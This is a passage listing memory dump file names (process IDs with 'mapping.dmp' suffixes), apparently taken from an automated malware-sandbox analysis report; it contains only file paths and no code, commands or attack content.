- memory/760-149-0x0000000000000000-mapping.dmp
- memory/1008-166-0x0000000000000000-mapping.dmp
- memory/1044-181-0x0000000000000000-mapping.dmp
- memory/1068-197-0x0000000000000000-mapping.dmp
- memory/1132-185-0x0000000000000000-mapping.dmp
- memory/1140-167-0x0000000000000000-mapping.dmp
- memory/1272-191-0x0000000000000000-mapping.dmp
- memory/1416-150-0x0000000000000000-mapping.dmp
- memory/1520-180-0x0000000000000000-mapping.dmp
- memory/1676-198-0x0000000000000000-mapping.dmp
- memory/1688-143-0x0000000000000000-mapping.dmp
- memory/1824-199-0x0000000000000000-mapping.dmp
- memory/1912-154-0x0000000000000000-mapping.dmp
- memory/2156-164-0x0000000000000000-mapping.dmp
- memory/2192-165-0x0000000000000000-mapping.dmp
- memory/2252-140-0x0000000000000000-mapping.dmp
- memory/2276-138-0x0000000000000000-mapping.dmp
- memory/2308-163-0x0000000000000000-mapping.dmp
- memory/2364-130-0x0000000000000000-mapping.dmp
- memory/2400-162-0x0000000000000000-mapping.dmp
- memory/2648-161-0x0000000000000000-mapping.dmp
- memory/2904-189-0x0000000000000000-mapping.dmp
- memory/2928-186-0x0000000000000000-mapping.dmp
- memory/3132-201-0x0000000000000000-mapping.dmp
- memory/3424-188-0x0000000000000000-mapping.dmp
- memory/3472-172-0x0000000000000000-mapping.dmp
- memory/3492-187-0x0000000000000000-mapping.dmp
- memory/3640-196-0x0000000000000000-mapping.dmp
- memory/3684-195-0x0000000000000000-mapping.dmp
- memory/4020-153-0x0000000000000000-mapping.dmp
- memory/4128-168-0x0000000000000000-mapping.dmp
- memory/4172-174-0x0000000000000000-mapping.dmp
- memory/4232-202-0x0000000000000000-mapping.dmp
- memory/4308-169-0x0000000000000000-mapping.dmp
- memory/4312-171-0x0000000000000000-mapping.dmp
- memory/4368-184-0x0000000000000000-mapping.dmp
- memory/4388-190-0x0000000000000000-mapping.dmp
- memory/4392-183-0x0000000000000000-mapping.dmp
- memory/4408-147-0x0000000000000000-mapping.dmp
- memory/4432-152-0x0000000000000000-mapping.dmp
- memory/4456-177-0x0000000000000000-mapping.dmp
- memory/4480-194-0x0000000000000000-mapping.dmp
- memory/4536-160-0x0000000000000000-mapping.dmp
- memory/4556-146-0x0000000000000000-mapping.dmp
- memory/4568-176-0x0000000000000000-mapping.dmp
- memory/4572-175-0x0000000000000000-mapping.dmp
- memory/4608-178-0x0000000000000000-mapping.dmp
- memory/4612-148-0x0000000000000000-mapping.dmp
- memory/4616-156-0x0000000000000000-mapping.dmp
- memory/4656-157-0x0000000000000000-mapping.dmp
- memory/4764-145-0x0000000000000000-mapping.dmp
- memory/4772-192-0x0000000000000000-mapping.dmp
- memory/4916-193-0x0000000000000000-mapping.dmp
- memory/5016-173-0x0000000000000000-mapping.dmp
- memory/5028-151-0x0000000000000000-mapping.dmp
- memory/5052-141-0x0000000000000000-mapping.dmp
- memory/5104-139-0x0000000000000000-mapping.dmp